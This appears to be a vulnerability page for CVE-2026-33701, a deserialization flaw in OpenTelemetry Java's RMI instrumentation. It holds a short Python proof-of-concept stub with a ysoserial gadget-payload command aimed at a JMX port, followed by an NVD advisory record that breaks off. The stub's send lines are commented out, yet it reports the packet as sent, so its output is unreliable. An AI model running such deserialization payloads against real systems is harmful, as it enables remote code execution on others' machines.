CVE-2026-33701

# PoC Concept: Send malicious payload to RMI port import socket import subprocess # Generate payload using ysoserial (e.g., CommonsCollections5) # java -jar ysoserial.jar CommonsCollections5 'calc.exe' > payload.bin TARGET_HOST = 'target-ip' TARGET_PORT = 'jmx-port' # e.g., 9010 with open('payload.bin', 'rb') as f: payload = f.read() print(f"[*] Sending payload to {TARGET_HOST}:{TARGET_PORT}") # Note: Actual RMI protocol exploitation requires specific packet structure (e.g., using rmiploit or ysoserial's RMI registry module) # This is a simplified representation of the attack flow. # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((TARGET_HOST, int(TARGET_PORT))) # sock.send(payload) # sock.close() print('[*] Exploit packet sent.')

{"cve": {"id": "CVE-2026-33701", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:19.313", "lastModified": "2026-04-01T16:00:06.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry Java Instrumentation provides OpenTelemetry auto-instrumentation and instrumentation libraries for Java. In versions prior to 2.26.1, the RMI instrumentation registered a custom endpoint that deserialized incoming data without applying serialization filters. On JDK version 16 and earlier, an attacker with network access to a JMX or RMI port on an instrumented JVM could exploit this to potentially achieve remote code execution. All three of the following conditions must be true to exploit this vulnerability: First, OpenTelemetry Java instrumentation is attached as a Java agent (`-javaagent`) on Java 16 or earlier. Second, JMX/RMI port has been explicitly configured via `-Dcom.sun.management.jmxremote.port` and is network-reachable. Third, gadget-chain-compatible library is present on the classpath. This results in arbitrary remote code execution with the privileges of the user running the instrumented JVM. For JDK >= 17, no action is required, but upgrading is strongly encouraged. For JDK < 17, upgrade to version 2.26.1 or later. As a workaround, set the system property `-Dotel.instrumentation.rmi.enabled=false` to disable the RMI integration."}, {"lang": "es", "value": "OpenTelemetry Java Instrumentation proporciona auto-instrumentación de OpenTelemetry y bibliotecas de instrumentación para Java. En versiones anteriores a la 2.26.1, la instrumentación RMI registró un punto final personalizado que deserializaba los datos entrantes sin aplicar filtros de serialización. En la versión 16 de JDK y anteriores, un atacante con acceso de red a un puerto JMX o RMI en una JVM instrumentada podría explotar esto para lograr potencialmente la ejecución remota de código. Las tres condiciones siguientes deben cumplirse para explotar esta vulnerabilidad: Primero, la instrumentación de OpenTelemetry Java está adjunta como un agente Java ('-javaagent') en Java 16 o anterior. Segundo, el puerto JMX/RMI ha sido configurado explícitamente a través de '-Dcom.sun.management.jmxremote.port' y es accesible por red. Tercero, una biblioteca compatible con cadenas de gadgets está presente en el classpath. Esto resulta en ejecución remota de código arbitraria con los privilegios del usuario que ejecuta la JVM instrumentada. Para JDK &gt;= 17, no se requiere ninguna acción, pero se recomienda encarecidamente la actualización. Para JDK &lt; 17, actualice a la versión 2.26.1 o posterior. Como solución alternativa, establezca la propiedad del sistema '-Dotel.instrumentation.rmi.enabled=false' para deshabilitar la integración RMI."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "c ... (truncated)